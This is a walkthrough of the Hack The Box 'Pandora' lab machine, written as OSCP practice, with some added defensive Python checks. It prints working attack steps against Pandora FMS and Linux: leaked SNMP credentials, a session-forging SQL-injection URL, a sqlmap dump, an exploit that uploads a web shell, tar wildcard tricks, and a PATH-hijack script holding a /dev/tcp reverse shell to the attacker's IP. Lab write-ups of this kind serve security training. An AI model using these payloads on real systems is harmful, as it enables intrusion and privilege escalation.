Prep for OSCP — HTB [E] Pandora — Writeup

You can also read this article on Medium.

Pandora is an easy-rated Linux machine. The SNMP port is discovered by a less common UDP nmap scan. Examining the SNMP service reveals clear-text credentials. After logging in over SSH with them, privileges are escalated horizontally by chaining SQL injection and RCE vulnerabilities in a web interface that runs locally but is not exposed externally. During enumeration as the user matt, a binary with the SUID bit set is found, and root is obtained by exploiting it with a PATH injection attack.

Information Gathering

Let's start with an nmap scan.

└─$ sudo nmap -sC -sV --open -oN nmap -vvv 10.10.11.136 
Nmap scan report for 10.10.11.136
Host is up, received reset ttl 63 (0.37s latency).
Scanned at 2024-05-30 10:40:38 EDT for 30s
Not shown: 997 closed tcp ports (reset), 1 filtered tcp port (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 24:c2:95:a5:c3:0b:3f:f3:17:3c:68:d7:af:2b:53:38 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDPIYGoHvNFwTTboYexVGcZzbSLJQsxKopZqrHVTeF8oEIu0iqn7E5czwVkxRO/icqaDqM+AB3QQVcZSDaz//XoXsT/NzNIbb9SERrcK/n8n9or4IbXBEtXhRvltS8NABsOTuhiNo/2fdPYCVJ/HyF5YmbmtqUPols6F5y/MK2Yl3eLMOdQQeax4AWSKVAsR+issSZlN2rADIvpboV7YMoo3ktlHKz4hXlX6FWtfDN/ZyokDNNpgBbr7N8zJ87+QfmNuuGgmcZzxhnzJOzihBHIvdIM4oMm4IetfquYm1WKG3s5q70jMFrjp4wCyEVbxY+DcJ54xjqbaNHhVwiSWUZnAyWe4gQGziPdZH2ULY+n3iTze+8E4a6rxN3l38d1r4THoru88G56QESiy/jQ8m5+Ang77rSEaT3Fnr6rnAF5VG1+kiA36rMIwLabnxQbAWnApRX9CHBpMdBj7v8oLhCRn7ZEoPDcD1P2AASdaDJjRMuR52YPDlUSDd8TnI/DFFs=
|   256 b1:41:77:99:46:9a:6c:5d:d2:98:2f:c0:32:9a:ce:03 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBNNJGh4HcK3rlrsvCbu0kASt7NLMvAUwB51UnianAKyr9H0UBYZnOkVZhIjDea3F/CxfOQeqLpanqso/EqXcT9w=
|   256 e7:36:43:3b:a9:47:8a:19:01:58:b2:bc:89:f6:51:08 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOCMYY9DMj/I+Rfosf+yMuevI7VFIeeQfZSxq67EGxsb
80/tcp open  http    syn-ack ttl 63 Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-favicon: Unknown favicon MD5: 115E49F9A03BB97DEB840A3FE185434C
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Play | Landing
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

I lost a lot of time on the directory fuzzing part. I even tried virtual host fuzzing and fuzzing subdirectories. But later, when I ran a UDP nmap scan, everything fell into place.

└─$ sudo nmap -sU panda.htb -vvv
Nmap scan report for panda.htb (10.10.11.136)
Host is up, received echo-reply ttl 63 (0.13s latency).
Scanned at 2024-05-30 11:29:51 EDT for 1091s
Not shown: 999 closed udp ports (port-unreach)
PORT    STATE SERVICE REASON
161/udp open  snmp    udp-response ttl 63

Initial Foothold - daniel

After discovering that the SNMP port is open, let's run snmpwalk. We will try our luck with the default community string, public.

┌──(kali㉿kali)-[~/htb/pandora]
└─$ snmpwalk -v2c -c public panda.htb
iso.3.6.1.2.1.1.4.0 = STRING: "Daniel"
iso.3.6.1.2.1.1.5.0 = STRING: "pandora"
iso.3.6.1.2.1.1.6.0 = STRING: "Mississippi"
iso.3.6.1.2.1.25.4.2.1.4.24186 = STRING: "/usr/bin/pandora_backup"
iso.3.6.1.2.1.25.4.2.1.5.816 = STRING: "-c sleep 30; /bin/bash -c '/usr/bin/host_check -u daniel -p HotelBabylon23'"

After waiting a little while, we start to see these outputs:

  • daniel:HotelBabylon23: with these credentials we can try to log in via SSH.
  • /usr/bin/pandora_backup: examining this binary should be our first priority once we are on the system.
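An added check from the defender's side (example code written for this post, not part of the original writeup or of Pandora FMS): it parses snmpwalk output and flags processes whose hrSWRunParameters string carries a credential, which is exactly how daniel's password leaked here. The sample walk output is constructed, and the list of credential-looking argument shapes is an assumption.

```python
import re

# Constructed sample of snmpwalk output, modelled on the lines above. The OID
# 1.3.6.1.2.1.25.4.2.1.5 (hrSWRunParameters, HOST-RESOURCES-MIB) holds each
# running process's argument string, which is how the password leaked here.
SAMPLE_WALK = """\
iso.3.6.1.2.1.1.4.0 = STRING: "Daniel"
iso.3.6.1.2.1.25.4.2.1.4.24186 = STRING: "/usr/bin/pandora_backup"
iso.3.6.1.2.1.25.4.2.1.5.816 = STRING: "-c sleep 30; /bin/bash -c '/usr/bin/host_check -u daniel -p HotelBabylon23'"
iso.3.6.1.2.1.25.4.2.1.5.900 = STRING: "--config /etc/example.conf"
"""

HR_SW_RUN_PARAMETERS = "1.3.6.1.2.1.25.4.2.1.5."
# Argument shapes that commonly carry a secret on the command line (assumed list).
CRED_PATTERNS = [
    re.compile(r"(?:^|\s)(?:-p|--password)[\s=]+([^\s'\"]+)"),
    re.compile(r"(?:pass|password|pwd|token)=([^&\s'\"]+)", re.I),
]
# snmpwalk prints OIDs as iso.X... or .1.X...; both mean 1.X...
LINE_RE = re.compile(r'^(?:iso|\.?1)\.(\S+) = STRING: "(.*)"$')


def find_cli_secrets(walk_output):
    """Return (pid, arguments, secret) for each hrSWRunParameters entry whose
    argument string looks like it contains a credential."""
    hits = []
    for line in walk_output.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        oid, value = "1." + m.group(1), m.group(2)
        if not oid.startswith(HR_SW_RUN_PARAMETERS):
            continue
        pid = int(oid[len(HR_SW_RUN_PARAMETERS):])
        for pattern in CRED_PATTERNS:
            s = pattern.search(value)
            if s:
                hits.append((pid, value, s.group(1)))
                break
    return hits


if __name__ == "__main__":
    for pid, args, secret in find_cli_secrets(SAMPLE_WALK):
        print(f"pid {pid}: credential {secret!r} visible in: {args}")
```

Feed it the real walk with `snmpwalk -v2c -c public host | python3 script.py` after swapping SAMPLE_WALK for sys.stdin.read(); a hit means the password is readable by anyone who can query the agent.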

Lateral Movement → matt

We logged into the target system via SSH using the daniel:HotelBabylon23 credentials we found from the SNMP output. The first thing I did was run linpeas.

daniel@pandora:~$ ./linpeas.sh 
...
root         799  0.0  0.0   2608   548 ?        Ss   16:02   0:00      _ /bin/sh -c sleep 30; /bin/bash -c '/usr/bin/host_check -u daniel -p HotelBabylon23'
...
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -                   
...
ServerName pandora.panda.htb
...
-rw-r--r-- 1 root root 14844 Mar  4  2020 /usr/share/php/DB/storage.php                              

I've taken notes above. Below are some of the attempts I made against mysql.

daniel@pandora:/$ mysql -h localhost -u daniel -p
Enter password: 
ERROR 1045 (28000): Access denied for user 'daniel'@'localhost' (using password: YES)
daniel@pandora:/$ mysql -h localhost -u matt -p
Enter password: 
ERROR 1045 (28000): Access denied for user 'matt'@'localhost' (using password: YES)
daniel@pandora:/$ mysql -h localhost -u root -p
Enter password: 
ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: YES)

Let’s inspect the /usr/bin/host_check binary file and print its contents using cat.

...
PandoraFMS host check utility
Now attempting to check PandoraFMS registered hosts.
Files will be saved to ~/.host_check
/usr/bin/curl 'http://127.0.0.1/pandora_console/include/api.php?op=get&op2=all_agents&return_type=csv&other_mode=url_encode_separator_%7C&user=daniel&pass=HotelBabylon23' > ~/.host_check 2>/dev/null
Host check unsuccessful!
Please check your credentials.
Terminating program!
Host check successful!
Terminating program!
Ussage: ./host_check -u username -p password.
Two arguments expected.
...
GCC: (Debian 10.2.1-6) 10.2.1 20210110
...

I noticed that the application is making a request to http://127.0.0.1/pandora_console/include/api.php?op=get&op2=all_agents&return_type=csv&other_mode=url_encode_separator_%7C&user=daniel&pass=HotelBabylon23. I tried making the request myself using curl.

daniel@pandora:/var/www$ curl http://127.0.0.1/pandora_console/include/api.php?op=get&op2=all_agents&return_type=csv&other_mode=url_encode_separator_%7C&user=daniel&pass=HotelBabylon23[1] 18617
[2] 18618
[3] 18619
[4] 18620
[5] 18621

I got a response, which suggests an interface is published locally. (Because the URL was not quoted, the shell treated each & as a background operator, which is where the [1]..[5] job numbers come from, and curl was only handed the part up to op=get; quote the URL to send the full query string.) When I listed the contents of the /var/www/pandora/pandora_console directory, SQL files appeared.

daniel@pandora:/var/www/pandora/pandora_console$ ls
ajax.php       docker_entrypoint.sh  index.php                         *pandoradb_data.sql*
attachment     Dockerfile            install.done                      *pandoradb.sql*
audit.log      extensions            mobile                            pandora_websocket_engine.service
AUTHORS        extras                operation                         tests
composer.json  fonts                 pandora_console.log               tools
composer.lock  general               pandora_console_logrotate_centos  vendor
COPYING        godmode               pandora_console_logrotate_suse    ws.php
DB_Dockerfile  images                pandora_console_logrotate_ubuntu
DEBIAN         include               pandora_console_upgrade

I thought of uploading these SQL files to my local MySQL server and accessing the data by running these SQL files.

MariaDB [(none)]> CREATE DATABASE pandoradb
    -> ;
Query OK, 1 row affected (0.000 sec)

MariaDB [pandoradb]> source /home/kali/htb/pandora/pandoradb.sql
Query OK, 0 rows affected (0.003 sec)
...

MariaDB [pandoradb]> source /home/kali/htb/pandora/pandoradb_data.sql
Query OK, 1 row affected (0.001 sec)
...

However, when I tried listing the data, most tables came back as empty sets. I did find a row in tconfig that gives the application version.

MariaDB [pandoradb]> SELECT * FROM tconfig WHERE token = 'current_package_enterprise'; 
+-----------+----------------------------+-------+
| id_config | token                      | value |
+-----------+----------------------------+-------+
|        83 | current_package_enterprise | 742   |
+-----------+----------------------------+-------+
1 row in set (0.000 sec)

MariaDB [pandoradb]> 

And when I typed pandora console 742 exploit into Google, I came across the following results.

First, we will gain access to the panel by exploiting an unauthenticated SQL injection, and then we will execute commands through an authenticated RCE to obtain a shell.

First, let’s forward the target’s local port 80 to our local port 8080 using SSH port forwarding. This way, we’ll be able to use our tools on Kali.

└─$ ssh -N -L 0.0.0.0:8080:localhost:80 daniel@panda.htb

If we inspect the exploit source code, we can see that the vulnerability lies in the session_id parameter of the chart_generator.php file.

Let's run sqlmap and dump the tsessions_php table to retrieve a session ID we can use to log into the system.

┌──(kali㉿kali)-[~/htb/pandora]
└─$ sqlmap -u "http://127.0.0.1:8080/pandora_console/include/chart_generator.php?session_id=2" --dbms=mysql -T tsessions_php --dump
...
[13:21:35] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/127.0.0.1'                                                          

┌──(kali㉿kali)-[~/…/share/sqlmap/output/127.0.0.1]
└─$ ls
dump  log  session.sqlite  target.txt

Let’s open the session.sqlite file using the DB Browser for SQLite application.

Let's take the session we obtained and, following the link https://sploitus.com/exploit?id=100B9151-5B50-532E-BF69-74864F32DB02, place it in the URL below and send a GET request. After that, when we send a GET request to the pandora_console path, we are logged into the system as admin.

http://192.168.60.131:8080/pandora_console/include/chart_generator.php?session_id=6414945083776795218%27%20union%20select%20%271%27,%272%27,%27id_usuario|s:5:%22admin%22;%27%20--%20a
http://192.168.60.131:8080/pandora_console/

The IP address 192.168.60.131 appears because I'm accessing the Kali VM from a Windows computer over NAT; Firefox on the Kali VM was lagging. You can do the same from Kali by using localhost, or from Windows by finding the address of the subnet you are connected to and browsing to it the same way.
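To make the injection concrete, an added example (not from the original post or the exploit): the page's session_id payload is run against a string-concatenated query and against a parameterised one, on an in-memory SQLite stand-in. The tsessions_php column names and the stored row are assumptions, and session_user mimics only the simple PHP-serialised key|s:N:"value"; form.

```python
import sqlite3
from urllib.parse import unquote

# The session_id value from the URL used above, URL-decoded.
INJECTED_ID = unquote(
    "6414945083776795218%27%20union%20select%20%271%27,%272%27,"
    "%27id_usuario|s:5:%22admin%22;%27%20--%20a"
)


def make_db():
    """In-memory stand-in for tsessions_php; the three columns are assumed from
    the three-column UNION in the payload, and the row is constructed test data."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE tsessions_php (id_session TEXT, last_active INTEGER, data TEXT)")
    con.execute("INSERT INTO tsessions_php VALUES ('abc123', 1717000000, 'id_usuario|s:6:\"daniel\";')")
    return con


def lookup_vulnerable(con, session_id):
    # String concatenation: the quote inside session_id closes the literal and
    # the rest of the input runs as SQL, so the UNION row comes back as a "session".
    sql = ("SELECT id_session, last_active, data FROM tsessions_php "
           "WHERE id_session = '" + session_id + "'")
    return con.execute(sql).fetchone()


def lookup_safe(con, session_id):
    # Parameterised query: the whole input is compared as one opaque string.
    sql = "SELECT id_session, last_active, data FROM tsessions_php WHERE id_session = ?"
    return con.execute(sql, (session_id,)).fetchone()


def session_user(row):
    """What the application then does with the row: read the user name out of
    the PHP-serialised session data (handles only the key|s:N:"value"; form)."""
    if row is None:
        return None
    _, found, rest = row[2].partition("id_usuario|s:")
    length, _, rest = rest.partition(":")
    if not found or not length.isdigit():
        return None
    return rest[1:1 + int(length)]


if __name__ == "__main__":
    con = make_db()
    print("vulnerable:", session_user(lookup_vulnerable(con, INJECTED_ID)))  # admin
    print("parameterised:", session_user(lookup_safe(con, INJECTED_ID)))     # None
```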

Here, I noticed that we can change the password directly without entering the old password, so we will be able to exploit the authenticated RCE.

Let's download the https://www.exploit-db.com/exploits/50961 exploit and run it with the password we changed to pandora.

└─$ python3 50961.py  -t 127.0.0.1 8080 -u admin pandora
/home/kali/.local/lib/python3.11/site-packages/requests/__init__.py:102: RequestsDependencyWarning: urllib3 (1.26.7) or chardet (5.2.0)/charset_normalizer (2.0.9) doesn't match a supported version!
  warnings.warn("urllib3 ({}) or chardet ({})/charset_normalizer ({}) doesn't match a supported "

        _ __,~~~/_        __  ___  _______________  ___  ___
    ,~~`( )_( )-\|       / / / / |/ /  _/ ___/ __ \/ _ \/ _ \
        |/|  `--.       / /_/ /    // // /__/ /_/ / , _/ // /
_V__v___!_!__!_____V____\____/_/|_/___/\___/\____/_/|_/____/....

UNICORD: Exploit for CVE-2020-5844 (Pandora FMS v7.0NG.742) - Remote Code Execution
OPTIONS: Web Shell Mode
USERNAME: admin
PASSWORD: pandora
WEBFILE: unicord.php
WEBSITE: <http://127.0.0.1:8080/pandora_console>
PHPSESS: 6r1hl4c84nvrtt7t7hdf0mn13g
EXPLOIT: Connected to website! Status Code: 200
EXPLOIT: Logged into Pandora FMS!
EXPLOIT: Web shell uploaded!
SUCCESS: Web shell available at: http://127.0.0.1:8080/pandora_console/images/unicord.php?cmd=whoami

The web shell has been uploaded.

┌──(kali㉿kali)-[~/htb/pandora]
└─$ curl http://127.0.0.1:8080/pandora_console/images/unicord.php?cmd=whoami
matt

Let’s try connecting via SSH with the user ‘matt’ by adding our own id_rsa.pub to /home/matt/.ssh/authorized_keys. Since I encountered encoding issues while doing this with curl, I decided to use Burp Suite.

And we are in.

└─$ ssh matt@panda.htb -i ~/.ssh/id_rsa
...
matt@pandora:~$ cat user.txt

Privilege Escalation

Before moving on to linpeas, let's dump the /usr/bin/pandora_backup file that we found during the SNMP walk. It has the SUID bit set, so if we can exploit it, we can escalate privileges.

matt@pandora:~$ cat /usr/bin/pandora_backup
...
PandoraFMS Backup Utility
Now attempting to backup PandoraFMS client
tar -cvf /root/.backup/pandora-backup.tar.gz /var/www/pandora/pandora_console/*
Backup failed!
...

Here, what caught my attention is tar -cvf /root/.backup/pandora-backup.tar.gz /var/www/pandora/pandora_console/*. Let's first check whether the wildcard can be abused. For this we refer to the following article: Linux Privilege Escalation: Wildcards with tar

matt@pandora:/var/www/pandora/pandora_console$ echo "" > '--checkpoint=1'
matt@pandora:/var/www/pandora/pandora_console$ echo "" > '--checkpoint-action=exec=sh privesc.sh'
matt@pandora:/var/www/pandora/pandora_console$ echo 'bash -c "bash -i >& /dev/tcp/10.10.16.17/443 0>&1"' > privesc.sh
matt@pandora:/var/www/pandora/pandora_console$ chmod +x privesc.sh

matt@pandora:/var/www/pandora/pandora_console$ /usr/bin/pandora_backup

Here, the goal is for the tar command to end up in this form, with the crafted file names consumed as options:

tar file1 file2 ... --checkpoint=1 --checkpoint-action=exec=sh privesc.sh

However, this approach didn't work in our trials. There is one more thing to notice: tar is not called by its full path. In other words, if we put a directory of our own at the front of the PATH variable and place a file named tar in it, that is the tar that gets executed.

For this, let's rename privesc.sh to tar and move it into the directory we added to PATH. Then let's run the binary.

matt@pandora:/var/www/pandora/pandora_console$ export PATH=/home/matt:$PATH
matt@pandora:/var/www/pandora/pandora_console$ mv privesc.sh tar
matt@pandora:/var/www/pandora/pandora_console$ cp tar /home/matt/.
matt@pandora:/var/www/pandora/pandora_console$ cd /home/matt/.
matt@pandora:~$ /usr/bin/pandora_backup 
PandoraFMS Backup Utility
Now attempting to backup PandoraFMS client

And our shell is ready. Enjoy your meal.
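As an added audit check (example code, not from the writeup): pull the printable strings out of a binary the way strings does and flag embedded commands that are resolved through PATH or handed a wildcard, the two properties pandora_backup has. The byte sample is constructed from the strings shown above; a real run reads the SUID file. It generalises to any binary, not only this one.

```python
import re
import sys

# Constructed stand-in for the bytes of a SUID binary, carrying the two command
# strings seen in the dumps above (host_check and pandora_backup) plus filler.
# A real audit would read the file instead: open(path, "rb").read().
SAMPLE_BINARY = (
    b"\x7fELF\x02\x01\x01" + b"\x00" * 9
    + b"PandoraFMS Backup Utility\x00"
    + b"tar -cvf /root/.backup/pandora-backup.tar.gz /var/www/pandora/pandora_console/*\x00"
    + b"/usr/bin/curl 'http://127.0.0.1/pandora_console/include/api.php?op=get' "
    + b"> ~/.host_check 2>/dev/null\x00"
    + b"GCC: (Debian 10.2.1-6) 10.2.1 20210110\x00"
)

STRINGS_RE = re.compile(rb"[\x20-\x7e]{4,}")  # same rule `strings` uses by default
# A printable string that starts with a lower-case command word (optionally
# preceded by an absolute directory) followed by something argument-like.
CMD_RE = re.compile(r"^(?:/[\w./-]*/)?([a-z][\w.-]*)\s+(?:-\S+|/\S+|'.+')")
WILDCARD_RE = re.compile(r"\s\S*\*")


def audit_embedded_commands(blob):
    """Return (command, uses_absolute_path, has_wildcard, string) for every
    embedded string that looks like a shell command."""
    findings = []
    for raw in STRINGS_RE.findall(blob):
        s = raw.decode("ascii")
        m = CMD_RE.match(s)
        if m:
            findings.append((m.group(1), s.startswith("/"), bool(WILDCARD_RE.search(s)), s))
    return findings


def risky(findings):
    """A SUID program that resolves a command through PATH, or hands tar an
    unquoted wildcard, is exposed to exactly the two tricks tried above."""
    return [f for f in findings if not f[1] or f[2]]


if __name__ == "__main__":
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_BINARY
    for cmd, absolute, wildcard, s in risky(audit_embedded_commands(blob)):
        reasons = (["resolved via PATH"] if not absolute else []) + (["wildcard"] if wildcard else [])
        print(f"{cmd}: {', '.join(reasons)} :: {s}")
```

Run it as python3 script.py /usr/bin/pandora_backup on the box; the fix on the program side is to call /usr/bin/tar by absolute path (and to avoid shell globbing in a privileged helper).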

Conclusions

The Pandora machine, compared to others on Hack The Box, is relatively easy. What made it stand out was the freedom to try different approaches. There's no fixed path to solve it, which made me feel freer.

I spent a lot of time reconning the machine. I hadn’t thought of doing a UDP scan, so I added it as a backup plan right away.

This post is licensed under CC BY 4.0 by the author.